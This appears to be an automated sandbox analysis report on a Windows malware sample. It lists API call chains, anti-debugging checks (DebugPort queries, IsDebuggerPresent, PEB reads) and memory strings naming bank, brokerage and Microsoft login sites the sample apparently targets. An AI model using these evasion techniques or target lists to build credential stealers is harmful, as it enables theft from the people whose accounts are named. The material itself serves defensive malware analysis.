Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00F6F3F3
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F637EF
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F63B12
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00F6BCBC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0014C330 FindFirstFileW,FindNextFileW,FindClose,	8_2_0014C330

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F049A0

Source: 18155I0h.8.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 18155I0h.8.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 18155I0h.8.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 18155I0h.8.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 18155I0h.8.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 18155I0h.8.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: ClIUTLKtdeP.exe, 00000009.00000002.3752404068.00000000008BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
Source: 18155I0h.8.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 18155I0h.8.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 18155I0h.8.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 18155I0h.8.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 18155I0h.8.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 18155I0h.8.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 18155I0h.8.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 18155I0h.8.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 18155I0h.8.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 18155I0h.8.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: relog.exe, 00000008.00000002.3751067830.00000000026D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 0000000B.00000002.1991887770.00000251C66AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]]
Source: 18155I0h.8.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: 18155I0h.8.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 18155I0h.8.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 18155I0h.8.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 18155I0h.8.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 18155I0h.8.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 18155I0h.8.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 18155I0h.8.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 18155I0h.8.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 18155I0h.8.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 18155I0h.8.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 18155I0h.8.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 18155I0h.8.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: 18155I0h.8.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 18155I0h.8.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_0307096E rdtsc

5_2_0307096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_00487523 LdrLoadDll,

5_2_00487523

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F73F09 BlockInput,

0_2_00F73F09

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F03B3A

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F35A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00F35A7C

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F04B37 LoadLibraryA,GetProcAddress,

0_2_00F04B37

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_018F6180 mov eax, dword ptr fs:[00000030h]	0_2_018F6180
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_018F61E0 mov eax, dword ptr fs:[00000030h]	0_2_018F61E0
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_018F4B40 mov eax, dword ptr fs:[00000030h]	0_2_018F4B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306A30B mov eax, dword ptr fs:[00000030h]	5_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306A30B mov eax, dword ptr fs:[00000030h]	5_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306A30B mov eax, dword ptr fs:[00000030h]	5_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302C310 mov ecx, dword ptr fs:[00000030h]	5_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03050310 mov ecx, dword ptr fs:[00000030h]	5_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03108324 mov eax, dword ptr fs:[00000030h]	5_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03108324 mov ecx, dword ptr fs:[00000030h]	5_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03108324 mov eax, dword ptr fs:[00000030h]	5_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03108324 mov eax, dword ptr fs:[00000030h]	5_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B2349 mov eax, dword ptr fs:[00000030h]	5_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B035C mov eax, dword ptr fs:[00000030h]	5_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B035C mov eax, dword ptr fs:[00000030h]	5_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B035C mov eax, dword ptr fs:[00000030h]	5_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B035C mov ecx, dword ptr fs:[00000030h]	5_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B035C mov eax, dword ptr fs:[00000030h]	5_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B035C mov eax, dword ptr fs:[00000030h]	5_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FA352 mov eax, dword ptr fs:[00000030h]	5_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D8350 mov ecx, dword ptr fs:[00000030h]	5_2_030D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0310634F mov eax, dword ptr fs:[00000030h]	5_2_0310634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D437C mov eax, dword ptr fs:[00000030h]	5_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302E388 mov eax, dword ptr fs:[00000030h]	5_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302E388 mov eax, dword ptr fs:[00000030h]	5_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302E388 mov eax, dword ptr fs:[00000030h]	5_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305438F mov eax, dword ptr fs:[00000030h]	5_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305438F mov eax, dword ptr fs:[00000030h]	5_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03028397 mov eax, dword ptr fs:[00000030h]	5_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03028397 mov eax, dword ptr fs:[00000030h]	5_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03028397 mov eax, dword ptr fs:[00000030h]	5_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030EC3CD mov eax, dword ptr fs:[00000030h]	5_2_030EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030383C0 mov eax, dword ptr fs:[00000030h]	5_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030383C0 mov eax, dword ptr fs:[00000030h]	5_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030383C0 mov eax, dword ptr fs:[00000030h]	5_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030383C0 mov eax, dword ptr fs:[00000030h]	5_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B63C0 mov eax, dword ptr fs:[00000030h]	5_2_030B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DE3DB mov eax, dword ptr fs:[00000030h]	5_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DE3DB mov eax, dword ptr fs:[00000030h]	5_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DE3DB mov ecx, dword ptr fs:[00000030h]	5_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DE3DB mov eax, dword ptr fs:[00000030h]	5_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D43D4 mov eax, dword ptr fs:[00000030h]	5_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D43D4 mov eax, dword ptr fs:[00000030h]	5_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030403E9 mov eax, dword ptr fs:[00000030h]	5_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030403E9 mov eax, dword ptr fs:[00000030h]	5_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030403E9 mov eax, dword ptr fs:[00000030h]	5_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030403E9 mov eax, dword ptr fs:[00000030h]	5_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030403E9 mov eax, dword ptr fs:[00000030h]	5_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030403E9 mov eax, dword ptr fs:[00000030h]	5_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030403E9 mov eax, dword ptr fs:[00000030h]	5_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030403E9 mov eax, dword ptr fs:[00000030h]	5_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	5_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	5_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	5_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030663FF mov eax, dword ptr fs:[00000030h]	5_2_030663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302823B mov eax, dword ptr fs:[00000030h]	5_2_0302823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B8243 mov eax, dword ptr fs:[00000030h]	5_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B8243 mov ecx, dword ptr fs:[00000030h]	5_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0310625D mov eax, dword ptr fs:[00000030h]	5_2_0310625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302A250 mov eax, dword ptr fs:[00000030h]	5_2_0302A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03036259 mov eax, dword ptr fs:[00000030h]	5_2_03036259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030EA250 mov eax, dword ptr fs:[00000030h]	5_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030EA250 mov eax, dword ptr fs:[00000030h]	5_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03034260 mov eax, dword ptr fs:[00000030h]	5_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03034260 mov eax, dword ptr fs:[00000030h]	5_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03034260 mov eax, dword ptr fs:[00000030h]	5_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302826B mov eax, dword ptr fs:[00000030h]	5_2_0302826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E0274 mov eax, dword ptr fs:[00000030h]	5_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E0274 mov eax, dword ptr fs:[00000030h]	5_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E0274 mov eax, dword ptr fs:[00000030h]	5_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E0274 mov eax, dword ptr fs:[00000030h]	5_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E0274 mov eax, dword ptr fs:[00000030h]	5_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E0274 mov eax, dword ptr fs:[00000030h]	5_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E0274 mov eax, dword ptr fs:[00000030h]	5_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E0274 mov eax, dword ptr fs:[00000030h]	5_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E0274 mov eax, dword ptr fs:[00000030h]	5_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E0274 mov eax, dword ptr fs:[00000030h]	5_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E0274 mov eax, dword ptr fs:[00000030h]	5_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E0274 mov eax, dword ptr fs:[00000030h]	5_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306E284 mov eax, dword ptr fs:[00000030h]	5_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306E284 mov eax, dword ptr fs:[00000030h]	5_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B0283 mov eax, dword ptr fs:[00000030h]	5_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B0283 mov eax, dword ptr fs:[00000030h]	5_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B0283 mov eax, dword ptr fs:[00000030h]	5_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030402A0 mov eax, dword ptr fs:[00000030h]	5_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030402A0 mov eax, dword ptr fs:[00000030h]	5_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C62A0 mov eax, dword ptr fs:[00000030h]	5_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C62A0 mov ecx, dword ptr fs:[00000030h]	5_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C62A0 mov eax, dword ptr fs:[00000030h]	5_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C62A0 mov eax, dword ptr fs:[00000030h]	5_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C62A0 mov eax, dword ptr fs:[00000030h]	5_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C62A0 mov eax, dword ptr fs:[00000030h]	5_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	5_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_031062D6 mov eax, dword ptr fs:[00000030h]	5_2_031062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030402E1 mov eax, dword ptr fs:[00000030h]	5_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030402E1 mov eax, dword ptr fs:[00000030h]	5_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030402E1 mov eax, dword ptr fs:[00000030h]	5_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DE10E mov eax, dword ptr fs:[00000030h]	5_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DE10E mov ecx, dword ptr fs:[00000030h]	5_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DE10E mov eax, dword ptr fs:[00000030h]	5_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DE10E mov eax, dword ptr fs:[00000030h]	5_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DE10E mov ecx, dword ptr fs:[00000030h]	5_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DE10E mov eax, dword ptr fs:[00000030h]	5_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DE10E mov eax, dword ptr fs:[00000030h]	5_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DE10E mov ecx, dword ptr fs:[00000030h]	5_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DE10E mov eax, dword ptr fs:[00000030h]	5_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DE10E mov ecx, dword ptr fs:[00000030h]	5_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DA118 mov ecx, dword ptr fs:[00000030h]	5_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DA118 mov eax, dword ptr fs:[00000030h]	5_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DA118 mov eax, dword ptr fs:[00000030h]	5_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DA118 mov eax, dword ptr fs:[00000030h]	5_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F0115 mov eax, dword ptr fs:[00000030h]	5_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03060124 mov eax, dword ptr fs:[00000030h]	5_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C4144 mov eax, dword ptr fs:[00000030h]	5_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C4144 mov eax, dword ptr fs:[00000030h]	5_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C4144 mov ecx, dword ptr fs:[00000030h]	5_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C4144 mov eax, dword ptr fs:[00000030h]	5_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C4144 mov eax, dword ptr fs:[00000030h]	5_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302C156 mov eax, dword ptr fs:[00000030h]	5_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C8158 mov eax, dword ptr fs:[00000030h]	5_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03036154 mov eax, dword ptr fs:[00000030h]	5_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03036154 mov eax, dword ptr fs:[00000030h]	5_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03104164 mov eax, dword ptr fs:[00000030h]	5_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03104164 mov eax, dword ptr fs:[00000030h]	5_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03070185 mov eax, dword ptr fs:[00000030h]	5_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030EC188 mov eax, dword ptr fs:[00000030h]	5_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030EC188 mov eax, dword ptr fs:[00000030h]	5_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D4180 mov eax, dword ptr fs:[00000030h]	5_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D4180 mov eax, dword ptr fs:[00000030h]	5_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B019F mov eax, dword ptr fs:[00000030h]	5_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B019F mov eax, dword ptr fs:[00000030h]	5_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B019F mov eax, dword ptr fs:[00000030h]	5_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B019F mov eax, dword ptr fs:[00000030h]	5_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302A197 mov eax, dword ptr fs:[00000030h]	5_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302A197 mov eax, dword ptr fs:[00000030h]	5_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302A197 mov eax, dword ptr fs:[00000030h]	5_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F61C3 mov eax, dword ptr fs:[00000030h]	5_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F61C3 mov eax, dword ptr fs:[00000030h]	5_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	5_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	5_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]	5_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	5_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	5_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_031061E5 mov eax, dword ptr fs:[00000030h]	5_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030601F8 mov eax, dword ptr fs:[00000030h]	5_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B4000 mov ecx, dword ptr fs:[00000030h]	5_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D2000 mov eax, dword ptr fs:[00000030h]	5_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D2000 mov eax, dword ptr fs:[00000030h]	5_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D2000 mov eax, dword ptr fs:[00000030h]	5_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D2000 mov eax, dword ptr fs:[00000030h]	5_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D2000 mov eax, dword ptr fs:[00000030h]	5_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D2000 mov eax, dword ptr fs:[00000030h]	5_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D2000 mov eax, dword ptr fs:[00000030h]	5_2_030D2000
